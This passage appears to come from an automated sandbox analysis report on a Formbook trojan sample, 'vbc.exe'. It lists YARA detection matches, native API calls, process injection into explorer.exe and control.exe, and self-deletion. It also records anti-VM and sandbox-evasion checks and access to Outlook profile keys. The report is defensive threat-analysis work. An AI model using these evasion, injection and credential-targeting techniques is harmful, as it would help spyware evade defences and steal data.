        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0265CD04
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0265F0D0
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_053741D0
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07095DF0
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_070955B8
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_070955C8
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07096343
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07096FC8
        Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07095DE1
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BF900
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168E824
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671002
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016828EC
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016820A8
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB090
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAB40
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682B28
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EABD8
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167DBD2
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016703DA
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EEBB0
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FA2B
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016822AE
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681D55
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682D07
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B0D20
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016825DD
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167D466
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C841F
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681FF1
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168DFCE
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D6E30
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167D616
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682EF7
        Source: C:\Users\user\Desktop\vbc.exe Code function: String function: 015BB150 appears 133 times
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FB040 NtSuspendThread,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A10 NtQuerySection,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9560 NtWriteFile,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FAD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA770 NtOpenThread,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9760 NtOpenProcess,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F96D0 NtCreateKey,
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000002.415770591.0000000006E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000000.362679786.00000000004D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
        Source: vbc.exe, 00000000.00000002.415918626.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
        Source: vbc.exe, 00000000.00000002.416361250.0000000007010000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
        Source: vbc.exe, 00000006.00000003.407195484.0000000001513000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe, 00000006.00000003.404813945.0000000001373000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe, 00000006.00000002.500864587.00000000016AF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe Binary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
        Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: vbc.exe ReversingLabs: Detection: 31%
        Source: C:\Users\user\Desktop\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
        Source: C:\Users\user\Desktop\vbc.exe | Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
        Source: C:\Users\user\Desktop\vbc.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log
        Source: C:\Windows\SysWOW64\control.exe | File created: C:\Users\user\AppData\Local\Temp\4-9E1JJI
        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/2@4/3
        Source: vbc.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: vbc.exe, ProcExpGUI/Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\vbc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: vbc.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: vbc.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

        Data Obfuscation

        Source: vbc.exe, ProcExpGUI/Form1.cs | .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs | .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0160D0D1 push ecx; ret
        Source: initial sample | Static PE information: section name: .text entropy: 7.777091407724558

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\control.exe | File deleted: c:\users\user\desktop\vbc.exe
        Source: C:\Users\user\Desktop\vbc.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara match | File source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR
        Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
        Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Users\user\Desktop\vbc.exe TID: 3304 | Thread sleep time: -45877s >= -30000s
        Source: C:\Users\user\Desktop\vbc.exe TID: 2700 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\explorer.exe | Last function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01685BA5 rdtsc
        Source: C:\Users\user\Desktop\vbc.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\vbc.exe | API coverage: 4.4 %
        Source: C:\Users\user\Desktop\vbc.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\vbc.exe | Thread delayed: delay time: 45877
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
        Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
        Source: explorer.exe, 00000007.00000000.471787867.0000000000778000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000007.00000000.473972364.00000000042EE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
        Source: explorer.exe, 00000007.00000000.536669391.00000000042A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\user\Desktop\vbc.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\control.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BB171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BC962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015D4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015D4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016441E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BB1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016749A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016369A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E2990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015EA185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016351BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015D99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015D99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015D0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01672073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01681074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01637016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015CB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01684015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0164B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0164B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B58EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DB8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B40E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015B9080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015EF0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015EF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01633884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015F90AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BF358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BDB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01688B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015BDB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0167131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016623E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016623E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_016353CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015DDBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015E2397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_01685BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015EB390 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_015C1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0166D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\vbc.exe | Code function: 6_2_0167138A mov eax, dword ptr fs:[00000030h]
